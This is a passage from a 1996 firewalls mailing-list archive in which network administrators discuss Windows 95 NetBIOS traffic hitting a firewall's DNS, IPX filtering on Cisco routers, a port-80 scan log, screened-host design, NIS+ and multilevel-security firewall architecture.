> hours from the company's internal mail system but now the firewall DNS is > getting about 10,800 connects every day from the network management > system (NMS). The sniffer watching the NMS shows that new Windows > 95 machines are connecting to it with NetBios on port 137, NetBios Name > Service. It looks like the NMS box in turn queries the firewall. > > The firewall itself seems to be a Pentium machine, handling about 4,000 > incoming messages per day, 3,000 outgoing messages per day and a web user > population of about 150 users. > > Two questions: > 1) will the increased DNS queries cause the firewall performance > (throughput/response time) to drop; > 2) has anyone else seen a similar situation; > 3) how would you stop these evil little Windows 95 weevils from > nibbling away at the firewall DNS? If you can afford to, you can configure the IP stack on the WIN95 (NT has the same problems out of the box) so that these NetBios Service will not go anywhere near TCP/IP. I will leave this as an excercise to the reader but I will hint that it has to deal with BIND'ing in the CONTROL PANEL:NETWORKS and that if NETBIOS is BIND'ing to another protocol and then that protocol is anywhere near your TCP/IP settings, you have a transitive tunnel of NetBios tunneled in TCP/IP. Weak! I dont claim to be a WIN95/NT expert but I do manage a lot of firewalls and have seen this from the first beta's of WIN95. :-) --blast From firewalls-owner Thu Feb 1 19:53:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA15446 for firewalls-outgoing; Thu, 1 Feb 1996 19:42:20 -0800 (PST) Received: from ns2.trytel.com (ns2.trytel.com [204.191.54.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA15440 for ; Thu, 1 Feb 1996 19:42:16 -0800 (PST) Received: from tryc.on.ca (master.tryc.on.ca [204.191.54.8]) by ns2.trytel.com (8.6.12/8.6.12) with SMTP id WAA02424 for ; Thu, 1 Feb 1996 22:45:33 -0500 Received: by tryc.on.ca (5.x/SMI-SVR4) id AA05704; Thu, 1 Feb 1996 22:41:30 -0500 Date: Thu, 1 Feb 1996 22:41:30 -0500 From: wojtek@solaris.tryc.on.ca (Wojciech Tryc) Message-Id: <9602020341.AA05704@tryc.on.ca> To: firewalls@GreatCircle.COM Subject: HyperNews Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Md5: syQzt8RrBO7b1CBCzOJK/A== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have created HyperNews discussion about firewalls. Please feel free to join http://www.tryc.on.ca/HyperNews/get/forums/firewalls.html Sincerely, Wojciech Tryc From firewalls-owner Thu Feb 1 20:21:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA16013 for firewalls-outgoing; Thu, 1 Feb 1996 20:00:42 -0800 (PST) Received: from sarswati.mindware.soft.net (sarswati.mindware.soft.net [164.164.52.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA16008 for ; Thu, 1 Feb 1996 20:00:34 -0800 (PST) Received: from gangotri.mindware.soft.net by sarswati.mindware.soft.net id aa03408; 2 Feb 96 9:24 IST Received: by gangotri.mindware.soft.net with Microsoft Mail id <31124A6A@gangotri.mindware.soft.net>; Fri, 02 Feb 96 09:31:22 PST From: Prakash N Purushotham To: "'firewalls@greatcircle.com'" Subject: X#.hosts in /etc directory Date: Fri, 02 Feb 96 09:23:00 PST Message-ID: <31124A6A@gangotri.mindware.soft.net> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Yesterday when I was backing up my DNS databases and Mail databases, I found several instances of files with names X0.hosts, X1.hosts .... X7.hosts All these files were created on 27 Jan, 1996 (Saturday, nonworkingday) with nearly same time-stamps. Could this mean that my network is under attack? I did not find anything suspicious in the syslog and sulog files. Request Experts to comment TIA Prakash prakashp@mindware.soft.net From firewalls-owner Thu Feb 1 20:38:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA17498 for firewalls-outgoing; Thu, 1 Feb 1996 20:34:13 -0800 (PST) Received: from mail.state.mn.us (mail.state.mn.us [204.73.26.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA17472 for ; Thu, 1 Feb 1996 20:34:04 -0800 (PST) Received: from sunny.health.state.mn.us by mail.state.mn.us; Thu, 1 Feb 96 22:32:58 -0600 Received: from by sunny.health.state.mn.us (4.1/SMI-4.1) id AB29764; Thu, 1 Feb 96 22:32:55 CST Message-Id: <9602020432.AB29764@sunny.health.state.mn.us> Comments: Authenticated sender is From: "Elbert LaGrew" Organization: Minnesota Dept. of Health To: Firewalls@GreatCircle.COM Date: Thu, 1 Feb 1996 22:33:16 -0600 Subject: Internet-access from Novell (reply) Reply-To: elbert.lagrew@sunny.health.state.mn.us X-Mailer: Pegasus Mail for Windows (v2.23) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: bressen@hks.net[SMTP:bressen@hks.net] >Here's the worse problem I mentioned. > >I've grepped over 9000 archived articles of this group >and found no mention of how to firewall novell boxes from >each other. [stuff deleted] >How do I protect said client from, say, a disgruntled mailroom >employee at the provider end, bent on hacking on the clients network? [stuff deleted] >Are there any IPX/SPX packet filters available? > >Are there any IPX proxy server firewalls available? >Of course I'll start by recommending that the market data feed >box go onto its own ethernet segment, and that IP traffic is >not forwarded on or off of that segment. Well, one of the simplest ways of isolating Netware Lans is through a router. On a Cisco, this is as simple applying an access-list to the ethernet or serial port allowing or denying IPX traffic. If the Netware server is set up for TCPIP, again, a simple access-list will do since Netware does all of its work using IPX/SPX one need not worry too much about TCPIP traffic unless the server is running something like Netware IP or FlexIP which acts like a software bridge and encapsulates IPX/SPX in IP traffic. SAP traffic can also be blocked in this manner. Of course, this is not to take the place of a vigilent and thoughtful network administrator, who must make sure that passwords are changed, rights are secure, and that things are as they should be. For a good overview on SAPs and IPX access-lists, see documentation at http://www.cisco.com. There are others, but they don;t come to mind right now. HTH El From firewalls-owner Thu Feb 1 21:38:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA20152 for firewalls-outgoing; Thu, 1 Feb 1996 21:31:30 -0800 (PST) Received: from databus.databus.com (databus.databus.com [198.186.154.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA20147 for ; Thu, 1 Feb 1996 21:31:26 -0800 (PST) Message-ID: <9602020030.AA13691@databus.databus.com> Date: Fri, 2 Feb 96 00:30 EST From: Barney Wolff To: firewalls@GreatCircle.com Subject: Re: Windows 95 clobbering firewall? Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Date: Thu, 1 Feb 1996 13:53:21 -0500 (EST) >From: Sick Puppy > >The DNS running in the firewall used to get about 10 connects every 12 >hours from the company's internal mail system but now the firewall DNS is >getting about 10,800 connects every day from the network management >system (NMS). The sniffer watching the NMS shows that new Windows >95 machines are connecting to it with NetBios on port 137, NetBios Name >Service. It looks like the NMS box in turn queries the firewall. > > 2) has anyone else seen a similar situation; Win95 (and NT) send subnet broadcasts on UDP port 137. They may send unicasts to any host they have noticed. The broadcasts are how the "network neighborhood" folder gets populated. I have seen NT sending the subnet broadcast over a PPP link, which I thought really tacky. That was cured by turning off the "netbios helper" in NT (anecdotal). > 3) how would you stop these evil little Windows 95 weevils from > nibbling away at the firewall DNS? Well, you could turn off netbios on the Win machines. Alternatively, you could stick a router between them and the NMS, which should isolate the NMS from the subnet broadcasts. That may or may not help, if the NMS is pinging the Win machines. I have a feeling that they're set up to try to talk to any IP address they notice. And if all else fails, run a caching-only name server on the NMS, so it doesn't have to bother the firewall every time. But really, named is pretty efficient, and 10K queries a day isn't anything to worry about. Barney Wolff From firewalls-owner Thu Feb 1 21:53:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA20187 for firewalls-outgoing; Thu, 1 Feb 1996 21:32:52 -0800 (PST) Received: from Mail.RC.Toronto.on.ca (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA20181 for ; Thu, 1 Feb 1996 21:32:42 -0800 (PST) Received: from RWCooper.RC.Toronto.ON.CA ([205.206.47.2]) by Mail.RC.Toronto.on.ca (post.office MTA v1.9.1 evaluation license) with SMTP id AAA256 for ; Fri, 2 Feb 1996 00:30:31 -0500 Received: by RWCooper.RC.Toronto.ON.CA with Microsoft Mail id <01BAF105.A7FE47A0@RWCooper.RC.Toronto.ON.CA>; Fri, 2 Feb 1996 00:30:30 -0500 Message-ID: <01BAF105.A7FE47A0@RWCooper.RC.Toronto.ON.CA> From: "Russ.Cooper@RC.Toronto.on.ca" To: "'Firewalls'" Subject: FW: Windows 95 clobbering firewall? Date: Fri, 2 Feb 1996 00:30:28 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Install a Windows NT server and run WINS on it. Then point all your Windows '95 machines to the NT box as their primary WINS server and they should stop broadcasting for DNS resolution of NetBios names (or so goes the theory, haven't sniffed the difference myself). Basically, the Win95 machines are attempting to use their DNS connection via IP to resolve NetBios names. It would sound like they are running IP only. If you installed NetBeui in addition to IP, that would also resolve the DNS problems as they would use NetBeui internally first, then go to IP if the name couldn't be resolved via NetBeui. Same holds true if you put IPX in addition to IP, but IPX has more potential security risks than a non-routable protocol like NetBeui. If you have more than one protocol installed on the machine, make sure that IP is not set as the "default" protocol. As should be abundently clear by now, what Microsoft knows about IP my fish forget over dinner. A WINS server is designed to help clean up the mess left by non-NT MS machines working with IP. Let me know how it goes. Cheers, Russ Cooper, Senior Consultant - Internet SHL/Computer Innovations - Consulting Services Russ.Cooper@RC.Toronto.On.Ca - RWCooper@SHL.Com "can someone tell me where to go today to get the money to go to where I want to go today" From firewalls-owner Fri Feb 2 00:38:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA25076 for firewalls-outgoing; Fri, 2 Feb 1996 00:36:56 -0800 (PST) Received: from gatekeeper.n-i.nhs.uk (gatekeeper.n-i.nhs.uk [194.72.228.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA25071 for ; Fri, 2 Feb 1996 00:36:52 -0800 (PST) Received: from dismail.dis.n-i.nhs.uk by gatekeeper.n-i.nhs.uk; (5.65/1.1.8.2/23May95-1119AM) id AA14347; Fri, 2 Feb 1996 08:35:38 GMT Received: from cc:Mail by dis.n-i.nhs.uk id AA823279053; Fri, 02 Feb 96 08:34:44 GMT Date: Fri, 02 Feb 96 08:34:44 GMT From: "MCARDLE MARK" Message-Id: <9601028232.AA823279053@dis.n-i.nhs.uk> To: les@tracker.demon.co.uk, firewalls@greatcircle.com Subject: Re[2]: firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thanks for the reply les My organisation provides IT infrastructure support and management to nearly 40 Health Service trusts. The DEC firewall is a used to secure our point of access to the Internet however we may wish to implement packet filtering/logging between various lans on our wide area network. We have Cray Enterprise routers which can provide packet filtering but no logging facility. The Digital screend program provides both packet filtering and logging. We aim to keep our Digital firewall (mainly to protect the Internet/WAN point of access) but also want to look at ways of securing individual Lans within our WAN. Something like screend or its functional equivalent running on a PC/Workstation might satisfy this requirement. regards mark... ______________________________ Reply Separator _________________________________ Subject: Re: firewall Author: les@tracker.demon.co.uk at INTERNET_MAIL_GATEWAY Date: 02/02/96 02:02 Hi Mark, On Thu, 01 Feb 96 08:33:08 GMT, you wrote: >Does anyone know of a version of screend that runs on either DGUX, AIX, >HPUX or LINUX. We are currently using a Digital Firewall and are looking at >the DGUX DSO containment firewall. I think TIS Gauntlet and Raptor's Eagle run on AIX, and HP. Eagle runs on DGUX (intel) as well. Are you looking for a packet filter (like DECs) or an application gateway? Why are you looking to change your firewall? Cheers ...Les... +-----------------------------------------------+ | Les Carleton Firewalling Consultant / "The Software Lifeguard" | These are my views ... not my employer's / les@tracker.demon.co.uk | / +-------------------------------------------+ "Open Standards ... Free Software ... Live Free or Fry!" From firewalls-owner Fri Feb 2 05:30:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA02497 for firewalls-outgoing; Fri, 2 Feb 1996 05:11:01 -0800 (PST) Received: from hawk.hcsc.com (hawk.hcsc.com [204.5.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA02492 for ; Fri, 2 Feb 1996 05:10:55 -0800 (PST) Received: from london.hcsc.com by hawk.hcsc.com (5.61/harris-5.1) id AA26054; Fri, 2 Feb 96 08:09:56 -0500 Received: by london.csd.harris.com (5.61/HARRIS-4.0) id AA16539; Fri, 2 Feb 96 13:10:01 GMT From: jon@london.hcsc.com (Jon Shallow) Message-Id: <9602021310.AA16539@london.csd.harris.com> Subject: Re: Most Secure Unix? To: firewalls@GreatCircle.COM Date: Fri, 2 Feb 96 13:10:01 GMT In-Reply-To: ; from "Leroy Lacy" at Feb 1, 96 9:14 am X-Mailer: ELM [version 2.2 PL10] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Ian: > > well they are good products. The problem is that the systems are just > TCP./IP firewalls and cost an arm and a leg. Most of the night hawks > come in for around 100K. > > If we compete with them, we'll always have a good margin. > > Leroy > Leroy, I suspect that this was sent to firewalls in error, but some confusion needs to be cleared up now that it has. The Harris Night Hawk is a symmetric multiple processing computer, the price varying according to configuration. The CyberGuard (Harris' firewall product) comes in for considerably less than 100K. Regards Jon -- Jon Shallow, Harris Computer Systems Corporation Jon.Shallow@mail.hcsc.com Tel +44 (0) 1276 686886 Fax +44 (0) 1276 678733 From firewalls-owner Fri Feb 2 05:38:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA02459 for firewalls-outgoing; Fri, 2 Feb 1996 05:08:55 -0800 (PST) Received: from vulcan.iss.bnr.com (vulcan.iss.bnr.com [139.51.128.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA02447 for ; Fri, 2 Feb 1996 05:08:48 -0800 (PST) From: Mark_W_Loveless@smtp.bnr.com Received: from smtp.bnr.com by vulcan.iss.bnr.com (4.1/BNR/v1.0/910819) id AA18906; Fri, 2 Feb 96 07:07:49 CST Received: from cc:Mail by smtp.bnr.com id AA823273660; Fri, 02 Feb 96 06:42:40 CST Date: Fri, 02 Feb 96 06:42:40 CST Message-Id: <9601028232.AA823273660@smtp.bnr.com> To: firewalls@greatcircle.com, netmgr02@cbe.ab.ca (Glen Larwill) Subject: Re: Scanning from afar... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My first inclination is to say this is a web robot, a spider designed to locate web servers and then index their pages. Unless it grabbed stuff out of someone's table, I would think the IP scanning would be sequential. But I really suspect a spider. If it is home grown, that is what it is based off of. Do you have any web servers? I'd make sure your robot.txt file is configured the way you want it -- you don't want a robot to index /etc/passwd and stick it out on a search engine server or something goofy like that ;-) Mark_W_Loveless@smtp.bnr.com ______________________________ Reply Separator _________________________________ Subject: Scanning from afar... Author: netmgr02@cbe.ab.ca (Glen Larwill) at internet Date: 2/1/96 2:42 PM Has anyone seen this type of network scanning before? Addresses have been changed to protect the inocent and the guilty. Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39620) -> X.X.211.227(80), 1 packet Jan 30 11:14:42.962: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39621) -> X.X.211.243(80), 1 packet From firewalls-owner Fri Feb 2 05:53:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA02460 for firewalls-outgoing; Fri, 2 Feb 1996 05:08:57 -0800 (PST) Received: from vulcan.iss.bnr.com (vulcan.iss.bnr.com [139.51.128.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA02450 for ; Fri, 2 Feb 1996 05:08:50 -0800 (PST) From: Mark_W_Loveless@smtp.bnr.com Received: from smtp.bnr.com by vulcan.iss.bnr.com (4.1/BNR/v1.0/910819) id AA18909; Fri, 2 Feb 96 07:07:52 CST Received: from cc:Mail by smtp.bnr.com id AA823273665; Fri, 02 Feb 96 06:47:10 CST Date: Fri, 02 Feb 96 06:47:10 CST Message-Id: <9601028232.AA823273665@smtp.bnr.com> To: firewalls@GreatCircle.com, Sick Puppy Subject: Re: Windows 95 clobbering firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Look at how Netbios is configured on the Win95 boxes. It is probably tied to IP. I do not know how to unconfigure it, but wokred with someone after seeing this exact problem and they corrected it by unbinding Netbios from IP. Mark_W_Loveless@smtp.bnr.com ______________________________ Reply Separator _________________________________ Subject: Windows 95 clobbering firewall? Author: Sick Puppy at internet Date: 2/1/96 8:10 PM (Subject: Sick Puppy struggles to appear legitimate) I have a couple of sniffers in a network, one just inside the firewall and the other right next to the network management system. The last time I looked at these was about six weeks ago and when looking today I see something new. The DNS running in the firewall used to get about 10 connects every 12 hours from the company's internal mail system but now the firewall DNS is getting about 10,800 connects every day from the network management system (NMS). The sniffer watching the NMS shows that new Windows 95 machines are connecting to it with NetBios on port 137, NetBios Name Service. It looks like the NMS box in turn queries the firewall. The firewall itself seems to be a Pentium machine, handling about 4,000 incoming messages per day, 3,000 outgoing messages per day and a web user population of about 150 users. Two questions: 1) will the increased DNS queries cause the firewall performance (throughput/response time) to drop; 2) has anyone else seen a similar situation; 3) how would you stop these evil little Windows 95 weevils from nibbling away at the firewall DNS? Yeah, I know. Dawgs have trouble counting. Sick Puppy, the Cat_Eating_Dawg Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter From firewalls-owner Fri Feb 2 06:55:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA05584 for firewalls-outgoing; Fri, 2 Feb 1996 06:40:29 -0800 (PST) Received: from mbunix.mitre.org (mbunix.mitre.org [129.83.20.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA05566 for ; Fri, 2 Feb 1996 06:40:21 -0800 (PST) Received: from qmgateib.mitre.org (qmgateib.mitre.org [129.83.22.22]) by mbunix.mitre.org (8.6.10/8.6.9) with SMTP id JAA23489; Fri, 2 Feb 1996 09:39:22 -0500 Message-ID: Date: 2 Feb 1996 09:36:17 -0500 From: "Dan Vukelich" Subject: Re: Internet-access from Nov To: "elbert.lagrew@sunny.health.sta" , Firewalls@GreatCircle.COM X-Mailer: Mail*Link SMTP-QM 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Reply to: RE>Internet-access from Novell (reply) I haven't verified this, but I believe Morningstar does IPX filtering. -------------------------------------- Date: 2/2/96 2:33 AM To: Dan Vukelich From: elbert.lagrew@sunny.health.sta Received: by qmgateib.mitre.org with SMTP;2 Feb 1996 01:03:31 -0500 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by mbunix.mitre.org (8.6.10/8.6.9) with ESMTP id AAA04456 for ; Fri, 2 Feb 1996 00:26:01 -0500 Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQabdd08900; Fri, 2 Feb 1996 00:23:36 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA17498 for firewalls-outgoing; Thu, 1 Feb 1996 20:34:13 -0800 (PST) Received: from mail.state.mn.us (mail.state.mn.us [204.73.26.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA17472 for ; Thu, 1 Feb 1996 20:34:04 -0800 (PST) Received: from sunny.health.state.mn.us by mail.state.mn.us; Thu, 1 Feb 96 22:32:58 -0600 Received: from by sunny.health.state.mn.us (4.1/SMI-4.1) id AB29764; Thu, 1 Feb 96 22:32:55 CST Message-Id: <9602020432.AB29764@sunny.health.state.mn.us> Comments: Authenticated sender is From: "Elbert LaGrew" Organization: Minnesota Dept. of Health To: Firewalls@GreatCircle.COM Date: Thu, 1 Feb 1996 22:33:16 -0600 Subject: Internet-access from Novell (reply) Reply-To: elbert.lagrew@sunny.health.state.mn.us X-Mailer: Pegasus Mail for Windows (v2.23) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: bressen@hks.net[SMTP:bressen@hks.net] >Here's the worse problem I mentioned. > >I've grepped over 9000 archived articles of this group >and found no mention of how to firewall novell boxes from >each other. [stuff deleted] >How do I protect said client from, say, a disgruntled mailroom >employee at the provider end, bent on hacking on the clients network? [stuff deleted] >Are there any IPX/SPX packet filters available? > >Are there any IPX proxy server firewalls available? >Of course I'll start by recommending that the market data feed >box go onto its own ethernet segment, and that IP traffic is >not forwarded on or off of that segment. Well, one of the simplest ways of isolating Netware Lans is through a router. On a Cisco, this is as simple applying an access-list to the ethernet or serial port allowing or denying IPX traffic. If the Netware server is set up for TCPIP, again, a simple access-list will do since Netware does all of its work using IPX/SPX one need not worry too much about TCPIP traffic unless the server is running something like Netware IP or FlexIP which acts like a software bridge and encapsulates IPX/SPX in IP traffic. SAP traffic can also be blocked in this manner. Of course, this is not to take the place of a vigilent and thoughtful network administrator, who must make sure that passwords are changed, rights are secure, and that things are as they should be. For a good overview on SAPs and IPX access-lists, see documentation at http://www.cisco.com. There are others, but they don;t come to mind right now. HTH El From firewalls-owner Fri Feb 2 09:23:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA10044 for firewalls-outgoing; Fri, 2 Feb 1996 09:16:30 -0800 (PST) Received: from hitachi.com (msd.hitachi.com [137.168.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA10037 for ; Fri, 2 Feb 1996 09:16:26 -0800 (PST) Received: from osc.hitachi.com by hitachi.com (4.1/SMI-4.1) id AA13036; Fri, 2 Feb 96 09:17:32 PST Received: from enterprise ([205.158.60.129]) by osc.hitachi.com (4.1/SMI-4.1) id AA03693; Fri, 2 Feb 96 08:36:12 PST Date: Fri, 2 Feb 96 08:36:12 PST Message-Id: <9602021636.AA03693@osc.hitachi.com> X-Sender: bstout@oscsrv X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: sgcccdc@citec.qld.gov.au (Colin Campbell) From: Bill Stout Subject: Re: How secure can a screened host be? Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> I have a theoretical configuration where I would like to use a screened >> host, AND Cisco policy routing. The bennies would be the ability to >> firewall multiple links with one router. My concern is the overall security >> of such an arrangement in comparison to a true DMZ. >> >> >> >> Business partner---Router----Internal Net(s) >> / | \ >> Internet--/ | \---Firewall >> | >> Web Server(s) >> > >My problem with this is that your firewall/bastion is neither logically >nor physically between the internet router and the internal net(s). >... >Colin Same initial thoughts here. 'By the book Firewall design' logic would state there are obvious design flaws here. But the books were written before Cisco introduced 'policy routing', where all traffic from specific ports are sent to a specific IP address, which would be the firewall. The logical layout would then be: Business partner \ Firewall----Internal networks / \ Internet Web Servers Any additional segments can be directed to the Firewall also. BTW - This is a sanity check, I want to find errors with this configuration. William B. Stout Senior Systems Administrator Hitachi Data Systems Open Systems Center Santa Clara, California From firewalls-owner Fri Feb 2 09:38:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA10087 for firewalls-outgoing; Fri, 2 Feb 1996 09:19:17 -0800 (PST) Received: from uniwa.uwa.edu.au (uniwa.uwa.edu.au [130.95.128.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA10082 for ; Fri, 2 Feb 1996 09:19:09 -0800 (PST) Received: from midian (s185.dialup.uwa.edu.au [130.95.142.185]) by uniwa.uwa.edu.au (8.6.11/8.6.9) with ESMTP id BAA19783; Sat, 3 Feb 1996 01:15:13 +0800 Received: (dichro@localhost) by midian (8.6.12/8.6.12) id BAA00155; Sat, 3 Feb 1996 01:15:35 +0800 Date: Sat, 3 Feb 1996 01:15:35 +0800 Message-Id: <199602021715.BAA00155@midian> From: "Mikolaj J. Habryn" To: matt@maverick.itd.uts.edu.au CC: fina@novo.dk, firewalls@GreatCircle.COM In-reply-to: <199602012132.IAA17213@maverick.itd.uts.edu.au> (matt@maverick.itd.uts.edu.au) Subject: Re: NIS+ Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- >>>>> "Jas" == Jas (Matthew K) writes: Jas> Finn T Andersen wrote this... >> There has been a lot of good information and suggestions about >> NIS recently, however, noone has mentioned anything about NIS+. >> I have heard that NIS+ should be a very secure system, but in >> fact I have never heard about anyone who was using it. Is it >> available, and on what platforms ? Jas> yes, NIS+ is far more secure than NIS. It uses SecureRPC to Jas> form the under lying basis of its security, and uses access Jas> control lists for data in the tables (even down to indiviual Jas> table entries. ie everyone owns their own passwd entry so you Jas> can only see your own encrypted password field). it also Jas> supports network encryption of certain fields (down to Jas> individual entries within a table entry) on versions shipped Jas> within the US. SecureRPC is based on Diffie Helman for key hi - i'm considering setting up a centralized password database for a local net consisting of linux/sun/next boxen - is NIS+ freely available, or is it proprietary? can you send me some pointers to any relevant info? thanks for your time. mjh -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQDVAwUBMRJGs9v7NcoSvbspAQEd0wX9GbZiBnzC4M93vIGRdPAYTlMkVjccknKY ZcTvjzwixbKGffkuCDu7zufAQmo1UH2T8uyeTukP65tjQgZ2BAVdr/vl0KN2HlmX L0Mv/AzUgfmNXX1FSC2fPvMTtaY2lHoU6ZjZTE/Nt1e4RfDEWD0DueXWxrRVNxJv CkgNsuAC8mlJ5j0X77wDRmTYmjenSUPVx8kFVBMtMTwTP32xlO8lzAyxD68L10ud A/swGRwHjN6So5sruZJdYixL0mmkVt48 =6Osw -----END PGP SIGNATURE----- From firewalls-owner Fri Feb 2 10:12:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA10923 for firewalls-outgoing; Fri, 2 Feb 1996 09:59:22 -0800 (PST) Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA10904 for ; Fri, 2 Feb 1996 09:59:13 -0800 (PST) Received: from sousa.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0tiPkX-00021EC; Fri, 2 Feb 96 09:58 PST Received: by sousa.amdahl.com (Smail3.1.28.1 #4) id m0tiPic-0003oNC; Fri, 2 Feb 96 09:56 PST Message-Id: From: jgt10@amdahl.com (John G. Thompson) Subject: Re: Mandatory protection (was: product selection) To: firewalls@greatcircle.com Date: Fri, 2 Feb 1996 09:56:17 -0800 (PST) In-Reply-To: <9602012337.AA04194@garrison.com.> from "Jeromie Jackson" at Feb 1, 96 05:37:50 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jermoie Jackson wrote: > I would propose a different use for the MLS architecture. > > > outside---o.proxies----i.proxies-----inside > > > o.proxies have level of '1'. > i.proxies have level of '2'. > > > o.proxies do not have access to write to the inside ethernet interface. > i.proxies have priviledge to read o.proxies based on label being > dominant. > > From what I see, this would make a connection-based attack useless. > You could break into the firewall and subvert the o.proxies. Data-based > attacks could potentially succeed if neither proxies noticed the signature. > Connection based attacks would be limited to harming the level '1' environment. > > I would be interested in hearing comments... About 4 years ago I worked with a group of engineers to design an internet firewall using a B1 operatin system. We thought of the above idea, almost exactly. level SYSHI - audit data, sources RESTRICTED - sys admin sources, tools USER - Acces to internal network, NETWORK - Access to external/internet SYSTEM - Executables, configurations, reference data The more we looked at how to implement that architecture and provide other user services the more complicated the picture became. We knew we would have to re/train the users in MLS concepts and what new functions they would need to understand and use to get data from one level to another. Finally, I asked the question, WHAT ARE WE TRYING TO PROTECT? Everyone againist themselves, or the integrity of the system? Since we were trying to provide a raft of services that required a user account on the system (this was before socks and about 2 years before http appeared) we decided that the full blown environment would work, but it wouldn't serve the needs of the company or the users. We changed the focus of the security policy. Protect the system integrity from attack. We decided that if we protected the operating system and server software, the executables and configurations from unauthorized modification, we could prevent the majority of attacks from outside and inside that would disrupt the services we were trying to provide. We quit trying to use all of the MLS features to make absolutely sure that the servers and the users could NEVER interfere with each other. Instead, we focused on providing a platform that would be extremely hard to subvert either the operating system or the servers while providing as close a look and feel as the non-MLS operating system. We couldn't easily regulate the flow of data between the inside and outside networks and between some of the subsystems and between users without making the system labor intensive to make and maintain so we decided to accept the risk of running the almost identical software run elsewhere. We did have to make some modifications to close some loopholes and make some programs run correctly in an MLS environment. Since we couldn't spend day's training new user's on MLS concepts and commands, we create a system that was as close to the non-MLS version of the operating system as possible. Most users never really noticed the difference. The user's that noticed the difference, or ran into a problem due to the MLS environemnt were one's we wanted to talk to anyway. They were the ones trying to add a new service, or enhance existing ones. We had a few people join the ranks of the unoffical system admin crew by enlisting their aid in providing that service within the security profile of the system. JGT -- John G. Thompson jgt10@amdahl.com 1-408-992-2088 Amdahl Corporation, P.O. Box 3470 MS 383, Sunnyvale, CA 94088-3470 [The opinions expressed are MINE. They do not necessarily reflect the policies, procedures, press releases or opionions of the Amdahl Corporation.] From firewalls-owner Fri Feb 2 10:23:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA11526 for firewalls-outgoing; Fri, 2 Feb 1996 10:16:27 -0800 (PST) Received: from bastion.sware.com (bastion.sware.com [139.131.15.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA11514 for ; Fri, 2 Feb 1996 10:16:21 -0800 (PST) Received: from shlep.sware.com (shlep.sware.com [139.131.1.14]) by bastion.sware.com (8.6.12/8.6.5) with SMTP id JAA20420; Fri, 2 Feb 1996 09:02:51 -0501 Received: by shlep.sware.com (5.65/2.0) from mordred.sware.com id AA18926; Fri, 2 Feb 96 08:59:04 -0500 Received: by mordred.sware.com (5.65/2.1) id AA18008; Fri, 2 